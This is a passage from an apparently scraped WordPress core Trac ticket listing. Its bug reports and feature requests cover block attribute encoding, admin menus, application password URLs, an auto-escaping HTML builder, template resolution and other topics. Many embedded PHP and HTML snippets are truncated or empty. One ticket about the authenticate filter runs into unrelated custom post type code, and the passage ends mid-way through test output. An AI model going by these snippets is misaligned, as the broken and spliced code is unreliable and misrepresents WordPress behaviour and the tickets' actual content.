style=""font-size:20px;padding-top:10px;padding-right:20px;padding-bottom:10px;padding-left:20px"">Price Subtitle Description</div> <!-- /wp:atomic-blocks/ab-pricing-table-subtitle --> <!-- wp:atomic-blocks/ab-pricing-table-price {""price"":""\u003cstrong\u003e49\u003c/strong\u003e"",""currency"":""$"",""term"":""/mo""} --> <div class=""wp-block-atomic-blocks-ab-pricing-table-price ab-pricing-table-price-wrap ab-pricing-has-currency"" style=""padding-top:10px;padding-right:20px;padding-bottom:10px;padding-left:20px""><div itemprop=""offers"" itemscope itemtype=""http://schema.org/Offer""><span itemprop=""priceCurrency"" class=""ab-pricing-table-currency"" style=""font-size:24px"">$</span><div itemprop=""price"" class=""ab-pricing-table-price"" style=""font-size:60px""><strong>49</strong></div><span class=""ab-pricing-table-term"" style=""font-size:24px"">/mo</span></div></div> <!-- /wp:atomic-blocks/ab-pricing-table-price --> <!-- wp:atomic-blocks/ab-pricing-table-features {""customFontSize"":20,""paddingTop"":15,""paddingBottom"":15} --> <ul itemprop=""description"" class=""wp-block-atomic-blocks-ab-pricing-table-features ab-pricing-table-features ab-list-border-none ab-list-border-width-1"" style=""font-size:20px;padding-top:15px;padding-right:20px;padding-bottom:15px;padding-left:20px""><li>Product Feature One</li><li>Product Feature Two</li><li>Product Feature Three</li></ul> <!-- /wp:atomic-blocks/ab-pricing-table-features --> <!-- wp:atomic-blocks/ab-pricing-table-button {""buttonText"":""Buy Now"",""buttonBackgroundColor"":""#272c30"",""paddingTop"":15,""paddingBottom"":35} --> <div class=""wp-block-atomic-blocks-ab-pricing-table-button ab-pricing-table-button"" style=""padding-top:15px;padding-right:20px;padding-bottom:35px;padding-left:20px""><div class=""ab-block-button""><a class=""ab-button ab-button-shape-rounded ab-button-size-medium"" style=""color:#ffffff;background-color:#272c30"">Buy Now</a></div></div> <!-- /wp:atomic-blocks/ab-pricing-table-button --></div></div> <!-- /wp:atomic-blocks/ab-pricing-table --></div></div> <!-- /wp:atomic-blocks/ab-pricing --> CONTENT; wp_insert_post([ 'post_title' => 'Test block import with HTML in attributes', 'post_content' => $post_content ]); }}} 3. View the newly imported post. You'll see “this block contains unexpected or invalid content” where you expect to see blocks. If you repeat the above steps but use unencoded attributes as follows (find and replace '\u003c' with '<' and '\u003e' with '>'), the blocks import as expected: {{{ {""price"":""<strong>49</strong>"",""currency"":""$"",""term"":""/mo""} }}} **Environment** WordPress 5.2.1, Twenty Nineteen, no plugins active except for Atomic Blocks. macOS/Chrome. **Further info** This isn't limited to Atomic Blocks, as other blocks use HTML in block attributes. This issue was originally reported against the Gutenberg repo by another user who encountered the same, but it was suggested the issue belongs in Trac. I couldn't find a corresponding ticket here. https://github.com/WordPress/gutenberg/issues/14068" modernnerd Future Releases 12718 Better structure for admin menu Plugins normal normal Future Release enhancement reopened dev-feedback 2010-03-26T01:05:37Z 2018-02-07T09:17:16Z "Currently, the global $menu variable is one big linear array: {{{ $menu = array( [2] => array('Dashboard', ... [4] => array('', 'read', 'separator1', ...), [5] => array('Posts', ...) ... ) }}} To allow plugins to add a menu item at the end of a group, we use a bunch of additional global variables that remember the last element in each group. Also, we use arbitrary numeric indexes to specify the order of the items, instead of being able to position items relative to one another. It's all very low level. Things would be a lot easier if we had an actual API for manipulating the menu items." scribu Future Releases 31696 Better select, multi-select, and autocomplete/suggestion inputs in the admin Administration normal normal Future Release enhancement new dev-feedback 2015-03-19T16:47:15Z 2018-06-06T20:52:02Z "I know this has been brought up before, but can't find the original ticket. That said, a few months ago Helen brought up a potential integration of the Select2 library but, due to licensing issues, we were unable to proceed with it at the time ([https://github.com/select2/select2/issues/2468 GH issue]). The licensing issue has now been resolved and, since I've been unable to find the original ticket, I'm opening a new one along with a preliminary patch to add Select2 to core. At the moment, this patch is based on a new CSS class (select2) being added to any select field that should implement the Select2 library. I've added it to the select fields on the Settings->General page as an example, but didn't want to implement it system-wide until the community had a chance to speak up RE: where does/doesn't Select2 belong, or should it actually be implemented everywhere. The language and timezone fields seemed an obvious choice given their inherent size, but things like the emoji field under Settings->Reading that have a finite number of options seem less obvious. Discuss!" section214 Future Releases 55719 Better error message for sites using a FSE supporting theme when visiting the old navigation menus screen Menus 5.9 normal normal Awaiting Review defect (bug) new dev-feedback 2022-05-12T19:46:18Z 2022-05-12T19:46:18Z "When a block theme that supports full site editing is active, the user will see 'Your theme does not support navigation menus or widgets.' when navigating to the old Navigation Menus screen (`wp-admin/nav-menus.php`). This `wp_die()` notice is triggered when `add_theme_support()` is not called for `menus` and `widgets` (which is the case for FSE themes). While this is accurate, it could be misleading for someone who was familiar with WordPress prior to block-based themes. A FSE theme still supports widgets and navigation menus, just through blocks. It's not unreasonable to assume some users will have this page bookmarked or that plugins will continue linking to this page for some time. This ticket is to consider whether a different error message should be displayed when `wp_is_block_theme()` is `true`, potentially including a link back to the admin or a resource about navigation menus and widgets in a block-ified WordPress." desrosj Future Releases 47160 Backport blocking of plugin updates if required PHP version is not supported Plugins 5.2 normal normal Future Release defect (bug) new dev-feedback 2019-05-06T21:46:08Z 2019-10-07T23:38:51Z "Follow-up from #43987 and #44350. Description from https://core.trac.wordpress.org/ticket/43987?cnum_edit=46#comment:41 With WordPress 5.2 requiring at least PHP 5.6, many plugin authors will start updating their plugins to also require PHP 5.6. This is fine for users running WordPress 5.2, but for users on older versions of WordPress they'll start receiving update notifications for plugins that they may no longer be able to run if they're using a version of PHP older than 5.6. If the user updates such a the plugin then they'll likely start seeing fatal errors. Backporting the changes that prevent updates from being served to sites that don't meet the plugin's minimum PHP version will help avoid users on older branches finding themselves updating a plugin to a version that no longer works. " azaozz Future Releases 33095 Background updates: Administration blocked Upgrade/Install 4.2.3 normal normal defect (bug) new dev-feedback 2015-07-23T12:01:49Z 2019-06-05T06:41:12Z A while ago there was background update to 4.2.3 and everything works well. But administration was blocked for users without Administrator capability to update database. Many of our editors could not work until Administrator logged in and updated database. I am not sure if I am missing something or something wrong on our side, but it is a dangerous situation, I guess... Database should be updated automatically in this case of minor update? pavelevap Future Releases 44476 Backend section Access based on Role/User Role/Capability 4.9.6 normal normal Awaiting Review feature request new dev-feedback 2018-06-28T06:33:37Z 2018-08-02T16:52:43Z "Hello Team, I would like to suggest a Feature which we can plan in the current/Newer Version of WordPress. In WordPress backend, we can give a setting to Administrator that he can set restriction or give access only to the limited section. For example, if Admin wants that Subscriber can only Add Posts and can only view the pages. We can do that with Access Management. I understand there are certain plugins available for this, but we can have such feature by default in wordpress it will be really helpful as nowadays Admin Panel is being operated by multiple Admins/Roles. Let me know your thoughts on this and if this is no a good idea or suggestion, please feel free to share your opinion " kartiks16 Future Releases 57580 Avoid errors from null parameters in add_submenu_page() General normal normal Future Release enhancement reopened dev-feedback 2023-01-29T19:10:31Z 2024-02-26T14:26:18Z "6.2-alpha-55159, PHP 8.1 When using two different plugins (WP Review Slider Pro (Premium) or Ninja Forms following are thrown as PHP warning (If any of them are enabled same warnings are shown, if disabling both plugins no warning exist). {{{ wp-includes/functions.php:7045 strpos() wp-includes/functions.php:7045 wp_is_stream() wp-includes/functions.php:2153 wp_normalize_path() wp-includes/plugin.php:768 plugin_basename() wp-admin/includes/plugin.php:1405 add_submenu_page() wp-content/plugins/wp-review-slider-pro/admin/class-wp-review-slider-pro-admin.php:990 WP_Review_Pro_Admin->add_menu_pages() wp-includes/class-wp-hook.php:308 do_action('admin_menu') wp-admin/includes/menu.php:155 }}} Is there something Core can do to improve the experience here? Or both plugin authors need to change? {{{ wp-includes/functions.php:7045 /** * Tests if a given path is a stream URL * * @since 3.5.0 * * @param string $path The resource path or URL. * @return bool True if the path is a stream URL. */ function wp_is_stream( $path ) { $scheme_separator = strpos( $path, '://' ); if ( false === $scheme_separator ) { // $path isn't a stream. return false; } $stream = substr( $path, 0, $scheme_separator ); return in_array( $stream, stream_get_wrappers(), true ); } }}} " ipajen Future Releases 38896 avatar_settings help text may not be accurate if avatar_defaults is filtered Options, Meta APIs normal normal Awaiting Review enhancement new dev-feedback 2016-11-21T22:04:36Z 2019-03-19T00:49:20Z "The string says: {{{ For users without a custom avatar of their own, you can either display a generic logo or a generated one based on their email address. }}} But, I have a need to remove generated Gravatars entirely using the `avatar_defaults` filter, which makes this text misleading. In addition, this text is not wrapped in any defining HTML, making it impossible to reliably target with CSS or JS even." johnjamesjacoby Future Releases 42696 Autosave Notification not dismissible Autosave 4.2 normal major Awaiting Review defect (bug) new dev-feedback 2017-11-25T10:11:17Z 2023-05-15T10:09:44Z "If I make changes to a Post/Page and then decide I don't want to keep those changes, I'll simpy click away from the edit page. The next time I decide to edit the page, I'm prompted with a notification advising ""There is an autosave of this post that is more recent than the version below. View the autosave"" https://cl.ly/082A3B0u3J1u The only option I'm given is to view the autosaved version. This notificaiton should be dismissible. I shouldn't have to view the autosaved version when I already know that I don't want it. I also shouldn't have to resave the page, just to get rid of the notification. I would like to see a Dismiss icon/link so that we can dismiss the notification for good. When developing a theme or plugin, we're required to make all notifications dismissible. There's no reason why core notifcations shouldn't follow the same rules and also be dismissible." ahortin Future Releases 21273 Automatically open help panel Help/About normal trivial Future Release enhancement new dev-feedback 2012-07-14T19:04:20Z 2021-10-18T19:07:40Z "The help screen is highly inaccessible. Developers are not able to link to content in the help panels if you need to point users to specific directions for your plugin. This patch is a quick stab at it to see if it's worth while. What it does it allow direct links to the help panel. Upon pageload, it'll automagically open up to the correct panel. Usage: 1. Install the patch 2. Click http://wordpress.dev/wp-admin/index.php#tab-panel-help-layout Again, this is a quick stab. The concept could definitely be improve/abstracted and DRYed up. Let me know your thoughts :-)" ptahdunbar Future Releases 55189 "Automatic removal of ""Zero-width non-joiner"" in URL" Permalinks 5.9 normal critical Future Release defect (bug) new needs-unit-tests 2022-02-17T14:30:25Z 2023-02-23T23:37:32Z "There is a big problem in recent version of WordPress, ""[https://en.wikipedia.org/wiki/Zero-width_non-joiner Zero-width non-joiner]"" in the URLs is removed automatically. This will have a very bad effect on SEO (and has affected many sites) because the page with ""Zero-width non-joiner"" in their URL will goes to be 404. " man4toman Future Releases 48937 Auto-refresh maintenance mode screen Upgrade/Install normal normal Future Release enhancement new dev-feedback 2019-12-11T15:35:48Z 2022-08-08T07:48:44Z "''I [https://wordpress.org/support/topic/feature-request-with-solution-auto-refresh-maintenance-mode-screen/ already posted this] on the community forums, and was advised to post here instead.'' While WordPress updates a theme, a plugin or its core, it conveniently displays a message to any visitor: > Briefly unavailable for maintenance. Check back in a minute. Unfortunately, when presented with such a bland screen, most visitors will immediately leave and find a different website. If the visitor hasn’t disabled Javascript in his browser, it would be most helpful to make this a little more informative and add some automation: > Briefly unavailable for maintenance. > This page will automatically load when it is available. Have the webpage automatically refresh the page every (say) 10 seconds. Obviously, if the user has disabled Javascript, you can only display the brief message. = Solution I’m not really a programmer, but I’ve taken the default WordPress method and modified it to do just this — see below. You are welcome to use it as is, or to use the ideas and code within, to implement this feature automatically. I have tested this and it seems to work perfectly. A programmer might find a better way to implement it than I have done. There is one problem with what I’ve done, and that is the lack of translation for other languages. I don’t know how to cater for that. Thank you = Revised contents I took the file /wp-content/maintenance.php and modified it as follows. All that I did was to add a <script> section and modify the <div> section within the <body>. I changed nothing else. {{{ <!DOCTYPE html> <html xmlns=""http://www.w3.org/1999/xhtml"" dir='ltr'> <head> <meta http-equiv=""Content-Type"" content=""text/html; charset=UTF-8"" /> <meta name=""viewport"" content=""width=device-width""> <title>Maintenance

Sorry… Briefly unavailable for scheduled maintenance.

Please try again in a minute.

Thank you for your patience.

}}}" Paddy Landau Future Releases 46010 "Auto-generated term slugs can be greater than 200 characters, giving ""Could not insert term into the database."" error" Taxonomy normal normal Awaiting Review defect (bug) new needs-unit-tests 2019-01-16T14:37:23Z 2019-01-16T16:31:12Z "When a slug is not user defined, WordPress attempts to generate it from the term name within `wp_insert_term`. If the slug exists, when inserting subcategories, WordPress prefixes the slug with the top level term name. https://core.trac.wordpress.org/browser/tags/5.0.2/src/wp-includes/taxonomy.php#L2093 Because of this, long term names can go over the slug length limit and error. WordPress admin simply shows: > Could not insert term into the database. There is no reasoning provided, and when using wp_insert_term programatically it's hard to know what's at fault. This issue is more apparent when using cyrillic characters since they are stored encoded in the DB. Take ""Категория на продукта"" as an example. In the database this gets stored as: {{{ %d0%ba%d0%b0%d1%82%d0%b5%d0%b3%d0%be%d1%80%d0%b8%d1%8f-%d0%bd%d0%b0-%d0%bf%d1%80%d0%be%d0%b4%d1%83%d0%ba%d1%82%d0%b0 }}} This is 116 characters. The maximum allowed slug length defined in the wp_terms database schema is 200 characters. Steps to reproduce: - Add a top level category ""Категория на продукта"" - Add another ""Категория на продукта"" term as a subcategory of ""Категория на продукта"" - See error This is what WordPress attempted to insert into the database: {{{ ( [name] => Категория на продукта [slug] => %d0%ba%d0%b0%d1%82%d0%b5%d0%b3%d0%be%d1%80%d0%b8%d1%8f-%d0%bd%d0%b0-%d0%bf%d1%80%d0%be%d0%b4%d1%83%d0%ba%d1%82%d0%b0-%d0%ba%d0%b0%d1%82%d0%b5%d0%b3%d0%be%d1%80%d0%b8%d1%8f-%d0%bd%d0%b0-%d0%bf%d1%80%d0%be%d0%b4%d1%83%d0%ba%d1%82%d0%b0 [term_group] => 0 ) }}} The slug is too long. We either need error checking for this, or we need to truncate the slug length to avoid the issue and keep slug < 200 chars." mikejolley Future Releases 43916 Auto update translations when the respective plugin/theme is updated Upgrade/Install normal normal Awaiting Review feature request new dev-feedback 2018-05-01T13:41:41Z 2019-01-06T02:23:13Z "I find updating translations a bit of a pain because they only seem to appear (rightly so though) once you've updated a plugin or a theme. It'd be great if translations could be automatically updated after the respective plugin or theme has been updated removing the need to check if there are any translations waiting. Most often I find myself updating a plugin and then committing the update into version control and it's not until the commit has gone through that I reload the page to see that I now have new translation strings waiting. They really should be bundled with the main update of the plugin/theme." danieltj Future Releases 56129 Author Dropdown menu missing in Quick Edit Quick/Bulk Edit 6.0 normal normal defect (bug) reopened dev-feedback 2022-07-01T19:49:54Z 2023-05-15T19:47:19Z "My publishing team just reached out to me regarding a useful feature. This feature allowed my writing team to change the author for a post through ""Quick Edit"" under each post. This feature is now visibly gone from the Quick Edit menu, forcing writers to open each post in a separate tab and change the author from there. Can you provide instructions on how to re-enable the change author field in Quick Edit? Best, Duke" iheartdogs Future Releases 46748 authenticate filter hook does not behave as expected for priority values less than 20 SergeyBiryukov* Login and Registration 3.7 normal normal Future Release defect (bug) accepted dev-feedback 2019-04-01T12:33:38Z 2022-04-04T06:23:03Z "Returning null or a WP_Error object from functions bound to the [https://codex.wordpress.org/Plugin_API/Filter_Reference/authenticate authenticate] filter at priority values less than 20 does not prohibit a user from logging in. Consider the following snippet: {{{#!php array( 'name' => __('Products', 'textdomain'), 'singular_name' => __('Product', 'textdomain'), ), 'public' => true, 'has_archive' => true, 'allowed_blocks' => array( 'core/image', 'core/paragraph', 'core/heading', 'core/list', 'core/embed', 'core/missing', 'core/button', 'core/buttons', ), ) ); } add_action('init', 'wporg_custom_post_type'); }}} " smeedijzeronline Future Releases 57809 Application password success_url should allow http when host is localhost or localhost:port Application Passwords normal normal Awaiting Review enhancement new needs-unit-tests 2023-02-25T21:32:38Z 2023-03-22T02:19:31Z When using wp-admin/authorize-application.php to walk a user through the application password flow, WordPress will refuse to use a success_url with an http scheme, requiring that it's https (or a custom scheme). This is good security, and browsers implement the same SSL requirement for many browser APIs for the same reason. However, browsers also have an exception for http://localhost URLs, because it makes local testing much easier. WordPress should do the same here; a local test of a web app which interacts with the WordPress API should be able to walk a user through the application passwords flow, and at the moment it can't. Similarly, a non-web app running on a desktop computer can stand up a temporary HTTP webserver on a high-numbered port to serve the success_url much more easily than it can register a custom URL scheme. aquarius Future Releases 15394 "Ancient ""Are you sure you want to do this"" now confusing" Security 3.1 normal minor Future Release defect (bug) new dev-feedback 2010-11-11T21:51:26Z 2019-05-17T10:48:08Z "The default failing nonce message did not pass the wife test. Asking ""Are you sure you want to do this?"" now that there is no longer ""OK"" and ""Cancel"" buttons is confusing and my wife just asked me ""How do I tell I'm sure?"" Not sure about the best wording, I took the same approach as Twitter's expired OAuth token links with a message that does not let user think there is something to confirm." ozh Future Releases 50867 An API which encourages automatic escaping of HTML HTML API normal normal Awaiting Review enhancement new needs-unit-tests 2020-08-06T07:03:09Z 2024-02-07T12:33:50Z "It's common in WordPress to write PHP code that assembles a large bit of HTML using conditional logic. A good example of this is [https://github.com/WordPress/gutenberg/blob/master/packages/block-library/src/navigation-link/index.php#L106 render_block_core_navigation_link]. Unfortunately this type of code can become difficult to read and error prone. For example, we've had several reported XSS vulnerabilities in code like this. How do we feel about adding an API for **safely** building large bits of HTML? Attached is a patch which implements an API inspired by `createElement` in `@wordpress/element` and the external `classnames` JavaScript library. The primary interface is `wp_el`. It takes three arguments: an HTML tag name, an array of HTML attributes, and an array of child elements. You can nest calls to `wp_el` within each other to cleanly create deeply nested HTML. {{{#!php 'my-image' ), array( wp_el( 'img', array( 'src' => 'https://pbs.twimg.com/media/Ed_W9VQXkAAtYQY?format=jpg&name=medium' ) ), wp_el( 'figcaption', null, 'A cold refreshing glass of pilk' ), ) ); }}} {{{
A cold refreshing glass of pilk
}}} Optional arguments and automatic handling of non associative array values can be used to make usage quite succinct. {{{#!php }}} **The key design detail is that all strings are automatically escaped**. If you want to output unescaped HTML you have to do it explicitly. {{{#!php Unescaped HTML' ) ); }}} {{{
Unescaped HTML
}}} Lastly, `wp_classnames` provides a convenient way to assemble HTML `class` attributes. {{{#!php wp_classnames( array( 'my-link', 'is-current' => $post->ID === $id, ) ), ), array( wp_el( 'a', array( 'href' => $post->guid, ), $post->post_name ), ) ); }}} {{{
  • navigation-stored-in-old-way
  • }}} Thoughts? Are there alternative approaches common in the PHP ecosystem? Does such an API belong in Core? What other approaches can we take to prevent unescaped strings from being output?" noisysocks Future Releases 16788 Ampersands in e-mail address become invalid Users 3.0.5 normal normal Awaiting Review defect (bug) reopened dev-feedback 2011-03-07T20:01:38Z 2019-06-04T13:51:31Z "When an e-mail address contains an ampersand, WordPress improperly escapes the ampersand invalidating the e-mail address. Example: h&f@domain.com becomes h&amp@domain.com First of all, the proper HTML entity for ""&"" is '''&'''. Where did the extra '''amp''' come from? Also, an ampersand is a valid character in an e-mail address and should not be escaped. Escaping it could be a completely different e-mail address. I have not dug into the code to find out where this is happening but I'd assume in '''sanitize_email()'''." jfarthing84 Future Releases 38936 Alter Table Always Expects a COLUMN; Crashes on a CONSTRAINT Upgrade/Install normal normal Awaiting Review defect (bug) new dev-feedback 2016-11-24T17:25:13Z 2022-12-16T08:17:47Z "Hello, I'm attempting to activate a plugin I'm developing. The database creation scripts have CONSTRAINTs on them. When I attempt to reactivate, I'm getting this error: {{{ WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'CONSTRAINT `mytable_mycol_foreign` FOREIGN KEY (`mycol' at line 1] ALTER TABLE wp_mytable ADD COLUMN CONSTRAINT `mytable_mycol_foreign` FOREIGN KEY (`mycol`) REFERENCES `myothertable` (`myothercol`) }}} As you can see the SQL error lies in `ADD COLUMN CONSTRAINT`. This is being generated in `wp-admin/includes/upgrade.php` around line 2392 {{{#!php $fielddef) { // Push a query line into $cqueries that adds the field to that table. $cqueries[] = ""ALTER TABLE {$table} ADD COLUMN $fielddef""; $for_update[$table.'.'.$fieldname] = 'Added column '.$table.'.'.$fieldname; } }}} `ADD COLUMN` is hardcoded and is creating this SQL error. I googled for a solution but didn't find anything. I've tried it with the constraints being part of the full table creation statement, and also as a stand alone statement, with the same results. " philsown Future Releases 21211 Alter how settings_errors are output in options.php Administration 3.4.1 normal normal defect (bug) new dev-feedback 2012-07-10T23:44:37Z 2019-06-04T19:23:12Z "The `*_settings_error(s)` and `settings_error` functions are used mainly as part of the Settings API, but with the way that options.php currently handles the settings errors, it assumes that people will use this functionality exclusively with the Settings API. Notice options.php, starting at line 153: {{{ /** * Handle settings errors and return to options page */ // If no settings errors were registered add a general 'updated' message. if ( !count( get_settings_errors() ) ) add_settings_error('general', 'settings_updated', __('Settings saved.'), 'updated'); set_transient('settings_errors', get_settings_errors(), 30); }}} This simply assumes that no other outside source has registered any sort of setting error other than the current options page. TwentyEleven does this, and so if any other source has registered any notices via these functions, the ""Settings saved."" message will not be output because the first bit of logic will fail. I don't think this assumption can (nor should) be warranted, so there needs to be another way to handle this so that themes like TwentyEleven who only call `settings_errors` at the top of their options page don't get unknowingly hijacked by other sources. I always suggest registering your own errors at the end of the sanitization callback for your setting, and then output those specific errors within settings_errors to avoid any internal conflicts like this. Just looking for some ways to approach this. :-) " griffinjt Future Releases 60000 alot of tags is too many General normal normal WordPress.org enhancement new dev-feedback 2023-12-01T18:06:00Z 2024-01-09T16:12:22Z "[[Image(https://core.trac.wordpress.org/raw-attachment/ticket/13237/alot-of-bugs.gif)]] Previously: - #50000 - #40000 - #30000 - #20000 - #13536 - #13237 Changed with thanks to @joostdevalk. See #60001 " jorbin Future Releases 35537 AllPosts page: sorting is not remembered Posts, Post Types 4.4.1 normal minor Future Release enhancement new dev-feedback 2016-01-19T22:43:43Z 2017-02-06T09:13:22Z "STEPS TO REPRODUCE 1) Log in (administrator). 2) Remove all posts. 3) Create 3 new posts with titles accordingly ""1"", ""2"", ""3"" 4) Go to AllPosts page. 5) Click on ""Title"" column header to sort posts by title (as a result: posts is sorted in order 1,2,3). 6) Click ""Published (3)"". 7) Click ""All (3)"" EXPECTED RESULT: posts is sorted in order 1,2,3 ACTUAL RESULT: posts is sorted in order 3,2,1" antonrinas Future Releases 20558 allow wp_localize_script data to be added to existing objects Script Loader 3.3 normal normal enhancement new dev-feedback 2012-04-27T16:44:03Z 2019-06-04T21:07:31Z "Re: WP_Scripts::localize() located in wp-includes/class.wp-scripts.php Currently when `WP_Scripts::localize()` handles the printing of wp_localize_script data to JavaScript, it starts the string with a `var` declaration, like this: {{{ $script = ""var $object_name = "" . json_encode($l10n) . ';'; }}} Because this is printed in the global scope, it becomes a global variable regardless of whether it's preceded by `var`. As far as JavaScript is concerned the above string would be equivalent to: {{{ $script = $object_name . ' = ' . json_encode($l10n) . ';'; }}} or {{{ $script = 'this.' . $object_name . ' = ' . json_encode($l10n) . ';'; }}} or {{{ $script = 'window.' . $object_name . ' = ' . json_encode($l10n) . ';'; }}} But I suppose it's possible thru hooks to make it so that the localization data prints outside of the global scope, in which case you might want the `var` to be there (if it we're wrapped in a closure). So I think the '''overall best solution''' would to check if the `$object_name` contains a period `.` character. If it does, omit the `var`. In other words, make it so that: {{{ wp_localize_script('myplugin', 'myPluginData', $object ) }}} would print: {{{ var myPluginData = {...}; }}} but that: {{{ `wp_localize_script('myplugin', 'myPlugin.data', $object )` }}} would print: {{{ myPlugin.data = {...}; }}} By default the localization data runs before any enqueued scripts, in which case `myPlugin` would not yet be defined, but we should leave that for the JavaScript dev work out. My point is that the flexiblity should be there. Another route would be to apply a filter on that line but I don't think a filter is necessary if the above change is made." ryanve Future Releases 59918 Allow wp_get_global_settings to return null if the value is not found. General 5.9 normal normal Future Release enhancement new needs-unit-tests 2023-11-16T19:53:12Z 2023-11-27T20:30:54Z "Currently, `wp_get_global_settings()` defaults to returning the entire settings object whenever the value specified in the first parameter does not exist in the settings object. This means that any code making use of this function has to do an additional check to make sure that the expected setting value is returned. What would be preferable in many cases is that the function would return `null` or `false` if the setting is not found instead. For example, if I want to get the layout settings for a theme, I would call `wp_get_global_settings( array( 'layout' ) );` but may end up with the setting values or (in the case of a theme that doesn't support the layout setting) the entire settings object. This happens because `wp_get_global_settings()` makes use of the `_wp_array_get()` helper function with the entire settings object passed as the third default value. For backwards compatibility, it would be nice to add a third parameter to `wp_get_global_settings()` that would allow you to adjust this default behavior so that you could force the function to return `null` if the setting is not found by adjusting the default value passed to `_wp_array_get()`." joemcgill Future Releases 31643 Allow widget sidebars to be loaded open or closed via filtering Widgets 4.2 normal normal enhancement new dev-feedback 2015-03-14T23:44:54Z 2019-06-05T06:40:41Z This could be useful to allow certain sidebars to always load open or closed. silb3r Future Releases 44524 Allow Users to View Custom Post Type Admin Page Posts, Post Types normal normal Future Release defect (bug) new dev-feedback 2018-07-05T19:39:48Z 2020-02-21T00:26:01Z "Creating a custom post type and giving it custom capabilities, a user who can `edit_posts` but cannot `create_posts` cannot access the admin page: `/wp-admin/edit.php?post_type=cpt`. " wpsmith Future Releases 37577 "Allow users to ""petition"" for a post lock to be released" Editor normal normal Future Release enhancement new dev-feedback 2016-08-04T21:23:34Z 2020-05-25T17:12:05Z "Our post locking prevents two people from editing the same post, but introduces some awkwardness, in that your options are to wait and hope they exit the post (which slows you down), or boot them out (which could be rude or disruptive), or communicate with them through some other medium (which you might not have). It would be nice if there was a third option... to ""raise your hand"" about wanting to edit the post. If the editing user is actually working on the post, they could say ""not now,"" or they could ""save and release"". Or, if there is no response, that could be communicated to the petitioning user, as that could indicate that the editing user has left the post open and abandoned their computer. We could even communicate when the last mouse movement or on-page activity was." markjaquith Future Releases 39123 Allow usernames to be changed by administrators Users normal normal Awaiting Review enhancement new needs-unit-tests 2016-12-06T21:25:53Z 2017-11-21T17:13:11Z "Usernames cannot be changed. I'd like to propose that users who have the `edit_users` capability (administrators on single site installations, and super admins on multisite installations) are given the ability to update a user's username from their profile editing screen. The historical reason for disallowing changes to usernames is not clear, but it's most likely related to the generation of the `user_nicename` field which ideally needs to remain persistent so author archives don't 404. However, this can be addressed in the same way as changes to post slugs, where a user's old usernames and nicenames are recorded in usermeta when their username is updated (and their nicename is regenerated) and a canonical redirect can kick in to redirect to the new author archive URL. Any other considerations to make if usernames are allowed to be changed by administrators?" johnbillion Future Releases 48175 Allow Template Resolution Algorithm to be Replaceable Themes normal normal Awaiting Review feature request new needs-unit-tests 2019-09-30T03:08:16Z 2019-10-04T21:45:06Z "While I was writing a custom theme that doesn't use the results of the template hierarchy algorithm (THA), I noticed that a lot of work is done for nothing. That is, ultimately, several calls to PHP's `file_exists` is made inside `locate_template`. But I have a `template_include` filter that ignores the result of the template hierarchy algorithm. I was checking out the performance of the THA and found out that the calls to `file_exists` are relatively time intense. I wrapped some calls to `microtime` around the THA and found out that it takes about 1100 μs to run on my laptop with an SSD. So, I investigated how I could minimize the time in the THA knowing that I ultimately don't need the result. I discovered the `{$type}_template_hierarchy` and `{$type}_template` filter hooks. I used the `{$type}_template_hierarchy` filter to return an empty array which causes all the `file_exists` calls to be avoided. I also used a `{$type}_template` filter to quickly short circuit the THA. This allowed the execution time of the THA to go to about 35 μs. Much improved! Then I thought if there was a quicker way this could be done. So, I tried adding a filter called `skip_template_hierarchy` that returns false by default. When true is returned, then the entire THA is skipped. Therefore, false is passed to the `template_include` filter. In this filter is where I return the template based on my theme's template resolution algorithm. This made this section of code execute in about 5 μs. Even better. Then I thought whether there is a better way to do this, and I thought ""what if we can make the template resolution algorithm (TRA) replaceable?"" By default, the current THA would be used as the TRA. But a filter could be put into place that lets the user/developer choose a different TRA. So, I am writing a patch to add this functionality/feature. I am planning to name the filter `template_resolution_algorithm`. When the filter is applied, it will get `'resolve_template_hierarchy'` which will be a reference to a new function of the same name to be placed in `wp-includes/template.php`. This function is the default template resolution algorithm which of course resolves by using the THA we've all known for the longest time. After implementing this, I was surprised to see that it actually took about 6-7 μs to run. Not quite as fast as just skipping the THA with the `skip_template_hierarchy`. **Example** So, now I can use a custom template resolution algorithm like so: {{{ // Add the following to the theme's function.php add_filter( 'resolve_template_hierarchy', function () { return function () { $template = TEMPLATEPATH . '/templates/index.php'; return $template; }; } ); }}} The following works too: {{{ function dh__resolve_theme_template () { $template = TEMPLATEPATH . '/templates/index.php'; return $template; } add_filter( 'template_resolution_algorithm', function () { return 'dh__resolve_theme_template'; } ); }}} **Benefits** Obviously this can have performance benefits by being able to choose a different algorithm instead of running the THA and then ignoring its results. This would be ideal for implementing themes as single-page applications with minimal use of WP hooks. It would be useful if building a theme with an MVC-like architecture that utilizes a router mechanism. **Feedback** I'll upload my patch really soon. In the meantime, I am hoping I can get some feedback. Please note that I've only been doing PHP development for about 3 years off and on. Also, I've only been working with WP for a little over two years but only off and on. So, I can use some help making sure I am following PHP and WP conventions/idioms. But, I've been doing web development for 14 plus years. So, I am not a complete noob. **Testing** I can also use some guidance on where to add the unit tests for this particular feature. But before I write the tests, I'd like to get feedback first just in case this is something not even desired or maybe we come up with a better solution. I do see that there is a `tests/phpunit/tests/template.php` file to put `wp-includes/template.php` related tests in. Could someone who is familiar with the code base (core committers) point me at a good example of writing tests on filter hooks? I also need a little help with getting the unit tests to run. I've read the instructions at https://make.wordpress.org/core/handbook/testing/automated-testing/phpunit/ but they seem to be outdated, along with `tests/phpunit/README.md`. I tried the instructions in the project's `README.md`. They seem to work. The unit tests pass for commit 47643f7621..., but there are 6 new commits. The tests don't pass with these 6 new commits. I didn't try to narrow down which one is causing the error. Here are there errors: There were 12 errors: {{{ 1) Tests_Rel_Ugc::test_add_ugc Error: Call to undefined function wp_rel_ugc() /var/www/tests/phpunit/tests/formatting/WPRelUgc.php:14 2) Tests_Rel_Ugc::test_convert_ugc Error: Call to undefined function wp_rel_ugc() /var/www/tests/phpunit/tests/formatting/WPRelUgc.php:23 3) Tests_Rel_Ugc::test_wp_rel_ugc with data set #0 ('Double Quotes', '') Error: Call to undefined function wp_rel_ugc() /var/www/tests/phpunit/tests/formatting/WPRelUgc.php:31 4) Tests_Rel_Ugc::test_wp_rel_ugc with data set #1 ('', '') Error: Call to undefined function wp_rel_ugc() /var/www/tests/phpunit/tests/formatting/WPRelUgc.php:31 5) Tests_Rel_Ugc::test_wp_rel_ugc with data set #2 ('', '') Error: Call to undefined function wp_rel_ugc() /var/www/tests/phpunit/tests/formatting/WPRelUgc.php:31 7) Tests_Rel_Ugc::test_wp_rel_ugc with data set #4 ('', 